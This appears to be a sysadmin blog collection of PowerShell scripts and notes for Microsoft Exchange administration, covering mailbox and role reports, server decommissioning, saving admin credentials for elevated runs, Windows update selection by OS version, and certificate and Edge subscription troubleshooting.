Perform IISreset > verify that http://crm.kimconnect.com automatically forwards to https://crm.kimconnect.com; otherwise, reverse the changes and call Mr Google.

PowerShell: Microsoft Exchange Admin Reports

Function importExchangeModule{
$snapinLoaded = (get-pssnapin microsoft.exchange.management.* -ErrorAction SilentlyContinue).Name

$exchangeVersion=(GCM Exsetup.exe | % {$_.FileVersionInfo}).ProductVersion
$exchangeVersionMajor=$exchangeVersion.Substring(0,2);
$exchangeVersionMinor=$exchangeVersion.Substring(3,2);
$exchangeYear=0;
if (!($snapinLoaded)){

switch ([int]$exchangeVersionMajor){
6 {
$exchangeYear=2003;
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin -ErrorAction Continue;
break;
}
8 {
$exchangeYear=2007;
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.Admin -ErrorAction Continue;
break;
}
14 {
$exchangeYear=2010;
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.E2010 -ErrorAction Continue;
break;
}
15 {
$exchangeYear=2013;
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn -ErrorAction Continue;
}
15 {
if([int]$exchangeVersionMinor -eq 1){$exchangeYear=2016;}
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn -ErrorAction Continue;
}
15 {
if([int]$exchangeVersionMinor -eq 2){$exchangeYear=2019;}
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn -ErrorAction Continue;
}
}
"Exchange Server $exchangeYear is detected...`nThe appropriate Exchange PowerShell Snap-In has been imported...";
}
}

# This function is deprecated
function addAdminRoles{
$roles="Mailbox Import Export","Mailbox Search","Discovery Management"
# Exchange Admins need these three roles to perform operations on mailboxes: Organization Management, Mailbox Search, Mailbox Import Export, and Discovery Management
New-ManagementRoleAssignment -Name "Import Export_Organization Management" -SecurityGroup "Organization Management" -Roles $roles
}

#### Export all mailboxes to a network backup location ####
function exportAllMailboxes{
$storageUNC="\\FILESHERVER01\Backups\PSTs"
function monitorCompletion($check){
$migrationStatus=(Get-MailboxExportRequest -Mailbox $check).Status
$completed=$migrationStatus -like 'Completed'
if (!($completed)){
Write-Host -NoNewline "Waiting for $check batch to complete..."
$dots=50
$timeout=10 #10 seconds
while (!($completed)) {
$dots-=1;
#$timeout-=2; # Timeout is optional
#if($timeout -lt 0){"$timeout seconds have passed. Skip this waiting."; continue;}
if ($dots -eq 0){Write-Host ".";$dots=50;} # reload dots
else {Write-Host -NoNewline "."}
Start-Sleep -s 2
$completed.Refresh()
}
}
Write-Host "$check batch is completed."
}

$userAliases=Get-Mailbox -ResultSize unlimited
foreach ($userAlias in $userAliases){
New-MailboxExportRequest -Mailbox $userAlias -FilePath "$storageUNC\$userAlias.pst"
sleep 10;
# monitorCompletion $userAlias;
}
}

#### Create roles resport ####
function rolesReport{
$rolesReportFile="C:\rolesReport.csv"
$roles="Organization Management","Discovery Management"
$report=foreach ($role in $roles){
"$role`:`r-------------------------------------------------";
Get-RoleGroupMember $role | Format-Table;
"`n";
}
$report=$report|Out-String
$report+="`nOther Roles Assignments:`r-------------------------------------------------";
$assignments="Mailbox Import Export","Mailbox Search"
$report+=$assignments | %{Get-ManagementRoleAssignment -Role $_} | Select RoleAssigneename,Role,EffectiveUserName | Out-String
$report | Out-File -FilePath $rolesReportFile
}

#### Create mailbox resport ####
function mailboxesReport{
importExchangeModule;
$reportFile="C:\mailboxesReport.csv"
$sum=0;
$report=@()
$mailboxes=Get-Mailbox -ResultSize Unlimited | sort;
foreach ($mailbox in $mailboxes) {
$mailboxObject = (Get-MailboxStatistics $mailbox.SamAccountName)
$totalItems=$mailboxObject.TotalItemSize.Value.ToMB();
$totalDeleted=$mailboxObject.TotalDeletedItemSize.Value.ToMB();
$thisMailboxSize=$totalItems+$totalDeleted;
$report+=New-Object PsObject -property @{
'DisplayName'=$($mailbox.DisplayName)
'SamAccountName'=$($mailbox.SamAccountName)
'PrimarySmtpAddress'=$($mailbox.PrimarySmtpAddress)
'ServerName'=$($mailbox.ServerName)
'LastLogonTime'=$($mailboxObject.LastLogonTime)
'Database'=$($mailbox.Database)
'IsMailboxEnabled'=$($mailbox.IsMailboxEnabled)
'thisMailboxSize'=[int]$thisMailboxSize;
}
$sum+=$thisMailboxSize;
}
#$sumGB=$sum/1024;
$report+=New-Object PsObject -property @{
'DisplayName'="Total Storage For All Mailboxes"
'SamAccountName'=''
'PrimarySmtpAddress'=''
'ServerName'=''
'LastLogonTime'=''
'Database'=''
'IsMailboxEnabled'=''
'thisMailboxSize'=[int]$sum;
}
$report | Export-Csv -Path $reportFile -NoTypeInformation
"Reviewing exported contents...`n"
Import-Csv -Path $reportFile
}

Exchange Server Decommisioning

Decommissioning Exchange hosts should have all Exchange services disabled. Thereafter, we may safely turn these Exchange server off without interrupting email services.

Deleting Exchange servers aren’t usually recommended as there are risks involved. We could choose to archive virtual machine files onto an external hard drive to save space on production VM hosts. This typically is the extent of a decom task, and I do recommend that we pause decom activities of these machines at this phase to allow us the ability to “spin up” the machines should they consist of unknown-at-this-time email data.

Optionally, we may choose to fully purge Exchange servers. Here are the steps:

If the server is still online, start its Exchange services and move its public folder replicas to another Exchange host using these commands
$decomServers=”MAIL02″,”MAIL03″
$productionServer=”MAIL007″
$decomServers | %{MoveAllReplicas -sourceserver $_ -targetsever $productionServer}

Clear all remnants of the downed server from Active Directory – be advised that this is irreversible without AD restores:
-Connect to the domain controler
-Launch the run dialog (Windows Key + R)
-Type in the command “adsiedit.msc” et then press “OK”
-Right click on the console then “Connect to:”
-In the connexion dialog select “Well known Naming Context”
-In the drop down menu select “Configuration”
-Explode “CN=Configuration [domain]\CN=Services\CN=Microsoft Exchange\CN=[organization]\CN=Administrative Groups\CN=Servers”
-Right click on the dead server and pick “Delete”
-We also need to delete Database information as well, navigate to “CN=Configuration [domain]\CN=Services\CN=Microsoft -Exchange\CN=[organization]\CN=Administrative Groups\CN=Databases”
-Explode each items to find wich one is related to the old server, then delete it as well.
-Launch Server Manager > Navigate to Roles > Active Directory Domain Services > Active Directory users and Computers $domain > $domain > Microsoft Exchange Security Groups > Exchange Servers > right-click the decom server > remove this server to remove it from the list of Exchange Trusted Subsystem

PowerShell: Obtain Domain Admin Credential and Save It as an XML for Subsequent Execution

Working Version:
# Initialize with defaults
$credFileExists=$False

# This function is a workaround to the issue of variable $PSCommandPath being inaccessible outside of a function
function setCredentialFilePaths($userID){
# Export some variables
$GLOBAL:scriptPath=Split-Path -Path $PSCommandPath
$GLOBAL:credentialsFolder="$scriptPath\Credentials"
$GLOBAL:credentialFile="$credentialsFolder\"+"$userID`.clixml"
}

function checkFile($file){
$fileExists=[System.IO.File]::Exists($file)
if($fileExists){return $True}else{return $False;}
}

function checkCredentialFile($userID){
# Export some variables
$GLOBAL:path=Split-Path -Path $PSCommandPath
$GLOBAL:folder="$path\Credentials"
$GLOBAL:credentialFile="$folder\"+"$userID`.clixml"
return (checkFile $credentialFile);
}

# Check whether a given username matches the list of Domain Admins
function validateDomainAdminMembership{
param (
[string]$username
)
$matchedAdmin=$username -in $domainAdmins
if($matchedAdmin){
Write-Host "$username is a Domain Admin";
return $True;
}else{
Write-Host "$username not a Domain Admin.";
return $False;
}
}

function testCredential{
param (
[string]$username,
[string]$password
)
$plaintextPassword = (New-Object System.Management.Automation.PSCredential 'N/A',$providedPassword).GetNetworkCredential().Password
$domainBindTest = (New-Object System.DirectoryServices.DirectoryEntry($domainObject,$username,$plaintextPassword)).DistinguishedName
if ($domainBindTest){return $True;} else{Return $False;}
}

function obtainDomainAdminCred{
$domainAdmins=(Get-ADGroupMember -Identity "Domain Admins" -Recursive | %{Get-ADUser -Identity $_.distinguishedName} | Where-Object {$_.Enabled -eq $True}).SamAccountName
$global:cred=$False
do {
$providedID=Read-Host -Prompt 'Input a domain admin username'
# Check if credential file exists
If (!(checkCredentialFile $providedID)){
If (validateDomainAdminMembership $providedID){
$providedPassword = Read-Host -assecurestring "Please enter the password"
#$providedPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password))
#$providedCredential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword
$goodCredential=testCredential -username $providedID -password $providedPassword
if($goodCredential){
"Domain Admin Credential validated!";
$GLOBAL:user=$providedID
$GLOBAL:cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword;
saveCredentialToXml $providedID;
#return $True;
}
else{
"Password doesn't match.";
$global:cred=$False;
#return $False;
}
}else{
"Try again..."
#return $False;
}
}else{"This credential has already been saved previously.";break;}
} until ($cred)
}

function saveCredentialToXml($userID){
setCredentialFilePaths $userID
"Checking $credentialFile...";
If (!(checkFile $credentialFile)){
# Create folder if it doesn't exist
if(!(Test-Path -Path $credentialsFolder)){New-Item -path $credentialsFolder -type directory;}
"This credential has not been saved previously.`nSaving now...";
$cred | Export-Clixml $credentialFile;
}
}

function getCredentialfromXML($file){
checkCredentialFile $user
if (checkFile $file){
"Credential found...`n";
# Export stored XML credential
$GLOBAL:xmlCred=Import-clixml $file
}else{
"Credential NOT found...`n";
$GLOBAL:xmlCred=$null
pause;
break;
}
}

function runasDomainAdmin{

If (checkCredentialFile $env:USERNAME){
# Change the title and background color to signify an elevated session
$Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated as Domain Admin)"
$Host.UI.RawUI.BackgroundColor = "Black"
clear-host
"This script has been relaunched in the context as a member of Domain Admins with the ID: $(whoami)";
}else{
obtainDomainAdminCred;
getCredentialfromXML $credentialFile;
$runasUser="$env:USERDOMAIN\"+$xmlCred.GetNetworkCredential().username
$runasPassword=ConvertTo-securestring $xmlCred.GetNetworkCredential().password -AsPlainText -Force
$runasCred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $runasUser,$runasPassword
Start-Process powershell.exe -Credential $runasCred -NoNewWindow -ArgumentList "Start-Process powershell.exe -Verb runAs $PSCommandPath"

# Exit from the current process
exit
}

}

runasDomainAdmin;
"Now, we can execute other functions..."
pause;
Another Working Version
#### Run As Exchange Admin (Enterprise Admins) ####

# Initialize with defaults
$credFileExists=$False
$groupName="Enterprise Admins"
# $cred=[System.Net.CredentialCache]::DefaultNetworkCredentials; # this credential parsing doesn't work

# This function is a workaround to the issue of variable $PSCommandPath being inaccessible outside of a function
function setCredentialFilePaths($userID){
# Export some variables
$GLOBAL:scriptPath=Split-Path -Path $PSCommandPath
$GLOBAL:credentialsFolder="$scriptPath\Credentials"
$GLOBAL:credentialFile="$credentialsFolder\"+"$userID`.clixml"
}

function checkFile($file){
$fileExists=[System.IO.File]::Exists($file)
if($fileExists){return $True}else{return $False;}
}

function checkCredentialFile($userID){
# Export some variables
$GLOBAL:path=Split-Path -Path $PSCommandPath
$GLOBAL:folder="$path\Credentials"
$GLOBAL:credentialFile="$folder\"+"$userID`.clixml"
return (checkFile $credentialFile);
}

# Check whether a given username matches the list of Domain Admins
function validateDomainAdminMembership{
param (
[string]$username
)
$matchedAdmin=$username -in $exchangeAdmins
if($matchedAdmin){
Write-Host "$username is an Exchange Admin";
return $True;
}else{
Write-Host "$username not an Exchange Admin.";
return $False;
}
}

function testCredential{
param (
[string]$username,
[string]$password
)
$plaintextPassword = (New-Object System.Management.Automation.PSCredential 'N/A',$providedPassword).GetNetworkCredential().Password
$domainBindTest = (New-Object System.DirectoryServices.DirectoryEntry($domainObject,$username,$plaintextPassword)).DistinguishedName
if ($domainBindTest){return $True;} else{Return $False;}
}

function obtainExchangeAdminCred{
$exchangeAdmins=(Get-ADGroupMember -Identity $groupName -Recursive | %{Get-ADUser -Identity $_.distinguishedName} | Where-Object {$_.Enabled -eq $True}).SamAccountName
$global:cred=$False
do {
$providedID=Read-Host -Prompt 'Input a domain admin username'
# Check if credential file exists
If (!(checkCredentialFile $providedID)){
If (validateDomainAdminMembership $providedID){
$providedPassword = Read-Host -assecurestring "Please enter the password"
#$providedPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password))
#$providedCredential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword
$goodCredential=testCredential -username $providedID -password $providedPassword
if($goodCredential){
"Domain Admin Credential validated!";
$GLOBAL:user=$providedID
$GLOBAL:cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword;
saveCredentialToXml $providedID;
#return $True;
}
else{
"Password doesn't match.";
$global:cred=$False;
#return $False;
}
}else{
"Try again..."
#return $False;
}
}else{"This credential has already been saved previously.";break;}
} until ($cred)
}

function saveCredentialToXml($userID){
setCredentialFilePaths $userID
"Checking $credentialFile...";
If (!(checkFile $credentialFile)){
# Create folder if it doesn't exist
if(!(Test-Path -Path $credentialsFolder)){New-Item -path $credentialsFolder -type directory;}
"This credential has not been saved previously.`nSaving now...";
$cred | Export-Clixml $credentialFile;
}
}

function getCredentialfromXML($file){
checkCredentialFile $user
if (checkFile $file){
"Credential found...`n";
# Export stored XML credential
$GLOBAL:xmlCred=Import-clixml $file
}else{
"Credential NOT found...`n";
$GLOBAL:xmlCred=$null
pause;
break;
}
}

function runasExchangeAdmin{

If (checkCredentialFile $env:USERNAME){
# Change the title and background color to signify an elevated session
$Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated as Domain Admin)"
$Host.UI.RawUI.BackgroundColor = "Black"
clear-host
"This script has been relaunched in the context as a member of Domain Admins with the ID: $(whoami)";
}else{
obtainExchangeAdminCred;
getCredentialfromXML $credentialFile;
$runasUser="$env:USERDOMAIN\"+$xmlCred.GetNetworkCredential().username
$runasPassword=ConvertTo-securestring $xmlCred.GetNetworkCredential().password -AsPlainText -Force
$runasCred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $runasUser,$runasPassword

# Export the global credential to be used in subsequent functions
$GLOBAL:globalCred=$runasCred

# Start-Process powershell.exe -Credential $runasCred -NoNewWindow -ArgumentList "Start-Process powershell.exe -Verb runAs $PSCommandPath"
# Exit from the current process
# exit
}

}

runasExchangeAdmin;
"Enterprise Admin Credential has been loaded. Now connecting to remote server..."
################################################################################################################

$exchangeServer="EXCH02"
function enterPsSessionRemote($server){
Enter-PSSession -ComputerName $exchangeServer -Credential $globalCred
}
enterPsSessionRemote $exchangeServer
Work-in-Progress Version
function saveCredAsXML{
# Save Credentials into XML file for future use
$domain=$env:USERDOMAIN
$goodCredential=$False
$credentialsFolder="$scriptPath\Credentials"
$credentialsFolderExists=[System.IO.Directory]::Exists($credentialsFolder)
If(!($credentialsFolderExists)){mkdir $credentialsFolder;}

# Obtain username to check whether such credential has been saved prior
$user=(Read-Host -Prompt 'Input an Administrator User ID');
$credentialFile="$credentialsFolder\"+"$user`.clixml"
$credentialFileExists=[System.IO.File]::Exists($credentialFile)
if(!($credentialFileExists)){
"This credential has not been saved previously.";
$GLOBAL:repromptUsername=$False;
$goodCredential=$False;
}

function getCredential{
If ($repromptUsername){
$GLOBAL:user=(Read-Host -Prompt 'Input an Administrator User ID');
}
$GLOBAL:credentialFile="$credentialsFolder\"+"$user`.clixml"
$userID = "$domain\"+"$user"
$securedValue = (Read-Host -AsSecureString -Prompt "Input the password for account $userID")
$password = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($securedValue))
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$GLOBAL:cred = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $userID,$pass
$GLOBAL:credentialFile="$credentialsFolder\"+"$user`.clixml"
$GLOBAL:credentialFileExists=[System.IO.File]::Exists($credentialFile)
}

function testCredential{
#$domainAdmins=(Get-ADGroupMember -Identity "Domain Admins" -Recursive | %{Get-ADUser -Identity $_.distinguishedName} | Where-Object {$_.Enabled -eq $True}).SamAccountName
$connection=connect-viserver $vSpheres[0] -Protocol https -Credential $cred -ErrorAction SilentlyContinue
if($connection -eq $null) {
write-host "No connected servers or credential doesnt work."
$GLOBAL:goodCredential=$false;
$GLOBAL:repromptUsername=$True;
}
else{
#"Credential works. Thus, it has been saved at $credentialFile for future use."
Disconnect-VIServer -Server $global:DefaultVIServers -Force -Confirm:$false
cls;
$cred | Export-Clixml $credentialFile;
#$GLOBAL:goodCredential=$True;
break;
}
}

If(!($credentialFileExists)){
# Test credential and reprompt if it doesn't work
while ($goodCredential -eq $False){
getCredential;
testCredential;
}
}
}

######################################################

# Check whether a given username matches the list of Domain Admins
function validateDomainAdminMembership{
param (
[string]$username
)
$matchedAdmin=$username -in $domainAdmins
if($matchedAdmin){
Write-Host "$username is a Domain Admin";
return $True;
}else{
Write-Host "$username not a Domain Admin.";
return $False;
}
}

function testCredential{
param (
[string]$username,
[string]$password
)
$plaintextPassword = (New-Object System.Management.Automation.PSCredential 'N/A',$providedPassword).GetNetworkCredential().Password
$domainBindTest = (New-Object System.DirectoryServices.DirectoryEntry($domainObject,$username,$plaintextPassword)).DistinguishedName
if ($domainBindTest){return $True;} else{Return $False;}
}

function obtainDomainAdminCred{
$domainAdmins=(Get-ADGroupMember -Identity "Domain Admins" -Recursive | %{Get-ADUser -Identity $_.distinguishedName} | Where-Object {$_.Enabled -eq $True}).SamAccountName
$global:cred=$False
do {
$providedID=Read-Host -Prompt 'Input a domain admin username'
if (validateDomainAdminMembership $providedID){
$providedPassword = Read-Host -assecurestring "Please enter the password"
#$providedPassword = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto([System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password))
#$providedCredential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword
$goodCredential=testCredential -username $providedID -password $providedPassword
if($goodCredential){
"Domain Admin Credential validated!";
$GLOBAL:user=$providedID
$GLOBAL:cred=New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $providedID,$providedPassword;
#return $True;
}
else{
"Password doesn't match.";
$global:cred=$False;
#return $False;
}
}else{
"Try again..."
#return $False;
}
} until ($cred)
}

function validateCurrentAccountAsDomainAdmin{
if((whoami /groups) -match 'domain admins'){
# "This account is a Domain Admins member";
return $True;
}else{
# "This account is NOT a Domain Admins member";
return $False;
}
}

function checkFile($file){
$fileExists=[System.IO.File]::Exists($file)
if($fileExists){return $True}else{return $False;}
}

function saveCredentialToXml($username){
$scriptName=$PSCommandPath
$scriptPath=Split-Path -Path $scriptName
$GLOBAL:credentialsFolder="$scriptPath\Credentials"
$GLOBAL:credentialFile="$credentialsFolder\"+"$user`.clixml"

"Checking $credentialFile...";
If (!(checkFile $credentialFile)){
# Create folder if it doesn't exist
if(!(Test-Path -Path $credentialsFolder)){New-Item -path $credentialsFolder -type directory;}
"This credential has not been saved previously.`nSaving now...";
$cred | Export-Clixml $credentialFile;
}else{
"This credential file already exists.'nSkipping..."
}
}

<# Since Windows has intentionally unexposed the credentials of the currently logged on user for security purposes; hence, the current user credentials cannot be exported.
If(validateCurrentAccountAsDomainAdmin){
"Current Login User is a Member of Domain Admins";
$cred=[System.Net.CredentialCache]::DefaultNetworkCredentials;
saveCredentialToXml $user;
}else{
"Current Login User is NOT a Member of Domain Admins.";


}
#>

function getCredentialfromXML($file){
# Export stored XML credential
$GLOBAL:xmlCred=Import-clixml $file
}

obtainDomainAdminCred;
saveCredentialToXml $user;
getCredentialfromXML $credentialFile;
$xmlCred;
pause;

PowerShell: Detect Windows Version

This little snippet is reusable on many occasions where Windows version targeting is required.

function detectWindowsVersion{
# Display Windows Version Name
# $versionDigits=[Environment]::OSVersion.Version
# (Get-WmiObject -class Win32_OperatingSystem).Caption
# (Get-WmiObject -class Win32_OperatingSystem).Caption
$windowsOS=Get-WmiObject -class Win32_OperatingSystem
$windowsName=$windowsOS.Caption
$windowsServicePack=$windowsOS.ServicePackMajorVersion
$releaseID=(Get-ItemProperty "REGISTRY::HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion").ReleaseID;

switch -wildcard ($windowsName){
"Microsoft Windows XP*"{
"Windows XP is way out of date. Turn it off asap."
}
"Microsoft Windows 7*"{
"$windowsName has been detected...";
if ($windowsServicePack -eq 1){
# Windows 7 Service Pack 1 / Windows Server 2008 R2 Service Pack 1
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/05/windows6.1-kb4103718-x64_c051268978faef39e21863a95ea2452ecbc0936d.msu"
$GLOBAL:kb="KB4103718"
}else{
"Windows 7 is no longer being supported by Michael Shop..."
}
break;
}
"Microsoft Windows Server 2008*"{
"$windowsName has been detected...";
if ($windowsName -like "Microsoft Windows Server 2008 R2*"){
# Windows 7 Service Pack 1 / Windows Server 2008 R2 Service Pack 1
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/05/windows6.1-kb4103718-x64_c051268978faef39e21863a95ea2452ecbc0936d.msu"
$GLOBAL:kb="KB4103718"
}else{
"Windows 2008 is no longer being supported by Michael Shop..."
}
break;
}
"Microsoft Windows Server 2012*"{
if ($windowsName -like "Microsoft Windows Server 2012 R2*"){
"Microsoft Windows Server 2012 R2 has been detected...";
# Windows 8.1 / Windows Server 2012 R2
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/05/windows8.1-kb4103725-x64_cdf9b5a3be2fd4fc69bc23a617402e69004737d9.msu"
$GLOBAL:kb="KB4103725"
}else{
"Microsoft Windows Server 2012 has been detected...";
# Windows Server 2012 Default
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/04/windows8-rt-kb4103730-x64_1f4ed396b8c411df9df1e6755da273525632e210.msu"
$GLOBAL:kb="KB4103730"
}
break;
}
"Microsoft Windows Server 2016*"{
"$windowsName release ID $releaseID has been detected...";
switch ($releaseID){
1607{
# RS1 - Windows 10 version 1607 / Windows Server 2016
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/05/windows10.0-kb4103723-x64_2adf2ea2d09b3052d241c40ba55e89741121e07e.msu"
$GLOBAL:kb="kb4103723"
}
1709{
# RS3 - Windows 10 version 1709 / Windows Server 2016 version 1709
$GLOBAL:source = "http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103727-x64_c217e7d5e2efdf9ff8446871e509e96fdbb8cb99.msu"
$GLOBAL:kb="KB4103727"
}
1803{
# RS4 - Windows 10 1803 / Windows Server 2016 version 1803
$GLOBAL:source = "http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103721-x64_fcc746cd817e212ad32a5606b3db5a3333e030f8.msu"
$GLOBAL:kb="KB4103721"
}
}
break;
}
"Microsoft Windows 10*"{
"$windowsName release ID $releaseID has been detected...";
switch ($releaseID){
1607{
# RS1 - Windows 10 version 1607
$GLOBAL:source = "http://download.windowsupdate.com/d/msdownload/update/software/secu/2018/05/windows10.0-kb4103723-x64_2adf2ea2d09b3052d241c40ba55e89741121e07e.msu"
$GLOBAL:kb="KB4103723"
}
1703{
# RS2 - Windows 10 version 1703
$GLOBAL:source = "http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103731-x64_209b6a1aa4080f1da0773d8515ff63b8eca55159.msu"
$GLOBAL:kb="KB4103731"
}
1709{
# RS3 - Windows 10 version 1709 / Windows Server 2016 version 1709
$GLOBAL:source = "http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103727-x64_c217e7d5e2efdf9ff8446871e509e96fdbb8cb99.msu"
$GLOBAL:kb="KB4103727"
}
1803{
# RS4 - Windows 10 1803 / Windows Server 2016 version 1803
$GLOBAL:source = "http://download.windowsupdate.com/c/msdownload/update/software/secu/2018/05/windows10.0-kb4103721-x64_fcc746cd817e212ad32a5606b3db5a3333e030f8.msu"
$GLOBAL:kb="KB4103721"
}
}
break;
}
}
}

detectWindowsVersion;

Microsoft Exchange Server Certificates

When Exchange Server certificates expire, it’s the responsibility of the System Administrator to update those certs. Here’s a sequence of execution to ensure server up time.

1. Run inetmgr.exe (Internet Information Services Manager)

  • Default Web Site:
    – https * 443 => fqdn public certificate (e.g. Issued To = *.kimconnect.com; Issued By = “DigiCert SHA2 High Assurance Server CA”)
    – https 127.0.0.1 443 => fqdn public certificate
  • Exchange Back End:
    – https * 444 => private server certificate (e.g. Issued To = exch01.intranet.kimconnect.com, Issued By = KimConnect SHA2 CA)

2. Run services.msc to restart these services

  • IIS Admin Service (IISReset /noforce)
    Microsoft Account Signin Assistance
    Microsoft Exchange Information Store
    Microsoft Exchange Mailbox Assistants
    Microsoft Exchange Forms-based Authentication Service (may not be available on some instances)
  • Start an EMS > C:\Program Files\Microsoft\Exchange Server\V15\Bin\UpdateCas.ps1
  • Run inetmgr.exe > Reset the OWA virtual directory

3. Check Exchange Service Health to validate that there are no ServicesNotRunning items

[PS] C:\Windows\system32>Test-ServiceHealth

Role : Mailbox Server Role
RequiredServicesRunning : True
ServicesRunning : {IISAdmin, MSExchangeADTopology, MSExchangeDelivery, MSExchangeIS,
MSExchangeMailboxAssistants, MSExchangeRepl, MSExchangeRPC, MSExchangeServiceHost,
MSExchangeSubmission, MSExchangeThrottling, MSExchangeTransportLogSearch, W3Svc, WinRM}
ServicesNotRunning : {}

Role : Client Access Server Role
RequiredServicesRunning : True
ServicesRunning : {IISAdmin, MSExchangeADTopology, MSExchangeIMAP4, MSExchangeMailboxReplication,
MSExchangeRPC, MSExchangeServiceHost, W3Svc, WinRM}
ServicesNotRunning : {}

Role : Unified Messaging Server Role
RequiredServicesRunning : True
ServicesRunning : {IISAdmin, MSExchangeADTopology, MSExchangeServiceHost, MSExchangeUM, W3Svc, WinRM}
ServicesNotRunning : {}

Role : Hub Transport Server Role
RequiredServicesRunning : True
ServicesRunning : {IISAdmin, MSExchangeADTopology, MSExchangeEdgeSync, MSExchangeServiceHost,
MSExchangeTransport, MSExchangeTransportLogSearch, W3Svc, WinRM}
ServicesNotRunning : {}

Check the OWA VD settings:

Get-OwaVirtualDirectory | FL Identity,*auth*,*url*
Get-EcpVirtualDirectory | FL Identity,*auth*,*url*

4. Validate access to Exchange Admin Center

– Authenticate to https://{fqdn}/ecp
– If HTTP error 503 or 500 occurs, try https://{fqdn}/ecp/?ExchClientVer=15

5. Additional troubleshooting items

Change the authentication method of the “owa” virtual directory to Windows authentication

set-Owavirtualdirectory -identity "E15MBX\owa (Exchange Back End)" -WindowsAuthentication $True -Basicauthentication $false -Formsauthentication $false
IISReset /noforce

Raw Notes:

Error:
Failed to connect to the Edge Transport server ADAM instance with exception The supplied credential is invalid.. This could be caused by a failure to resolve the Edge Transport server name EXCH-EDGE.intra.net in DNS, a failure trying to connect to port 50636 on EXCH-EDGE.intra.net, network connectivity issues, an invalid certificate, or an expired subscription. Verify your network and server configuration.

Process to Resolve:

Preliminary steps to rule out easy to fix problems:

# Verify connectivity from Hub to Edge
ran check-netconnection function to verify connectivity between exch-hub to EXCH-EDGE port 50636 with success = $true

# Check to see whether there are any error messages in the queue:
Get-queue

Restart some services on Hub and Edge servers
1. Restart the following services on MBX Server
Microsoft Exchange EdgeSync
Microsoft Exchange Transport
2. Restart the following services on Edge Server
Microsoft Exchange ADAM
Microsoft Exchange Credential service
Microsoft exchange Transport

# Confirm if the certificate meets the FQDN of Edge Server if it has been enabled for SMTP service
get-exchangecertificate | FL

Intermediate Level steps to address connector issues:

Mail flow:
Outlook client <==> Hub Exchange <==> Edge Exchange <==> Barracuda (smart host) <==> Internet <==> Destination email systems

Generalization:
- Hub uses EdgeSync to connect to the edge server via ADAM credentials and those are periodically changed by the "Edge Credential Service"
- Only the Client Access Role server requires public certs. The rest of the other roles does not require such.
- Connectors between Edge and Hub servers require SSL, and those can be private certs.
- If the Edge server cert is updated, New-EdgeSubscription command needs to be ran to generate a newEdgeSubcription.xml file
- The newEdgeSubscription.xml needs to also be ran on the Hub server to import new Edge connector information
- Make sure the credential service is up and running on the edge.
- Call start-edgesynchronization is required to synchronize between Edge and Hub is a new subscription has been created
- Send connectors and Receive connectors can be automatically generated

[PS] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Exchange Server 2010>Start-EdgeSynchronization

RunspaceId : f9a541a8-51db-4b87-a392-b727eeae6c42
Result : CouldNotConnect
Type : Recipients
Name : EXCH-EDGE
FailureDetails : The supplied credential is invalid.
StartUTC : 8/9/2019 6:45:46 PM
EndUTC : 8/9/2019 6:45:46 PM
Added : 0
Deleted : 0
Updated : 0
Scanned : 0
TargetScanned : 0

RunspaceId : f9a541a8-51db-4b87-a392-b727eeae6c42
Result : CouldNotConnect
Type : Configuration
Name : EXCH-EDGE
FailureDetails : The supplied credential is invalid.
StartUTC : 8/9/2019 6:45:46 PM
EndUTC : 8/9/2019 6:45:46 PM
Added : 0
Deleted : 0
Updated : 0
Scanned : 0
TargetScanned : 0

[PS] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Exchange Server 2010>Get-EdgeSubscription

Name Site Domain
---- ---- ------
EXCH-EDGE intra.net/Co... intra.net

==============================================================================

Recreate Edge Subscription:

On Hub server

# Generate new private Exchange certificate
$domain="exch-hub"
$fqdn="exch-hub.intra.net"
New-ExchangeCertficate -DomainName $domain, $fqdn -PrivateKeyExportable $true -KeySize 2048

# Check certs
get-ExchangeCertificate

# Get more details about cert
# $newcert = get-ExchangeCertificate | ? { $_.certdate -like "blah blah"} | select name
$newcert="#######"
get-exchangecertificate $number | fl

# set iis to bind to new cert
# perform iisreset
# backup old cert and remove it

# New-SendConnector -Custom -Name Baracudda -AddressSpaces * -smarthost 10.10.11.1 -ForceHELO $true -SmartHostAuthMechanism None -Source $edgeServer

# Remove Edge Subscription
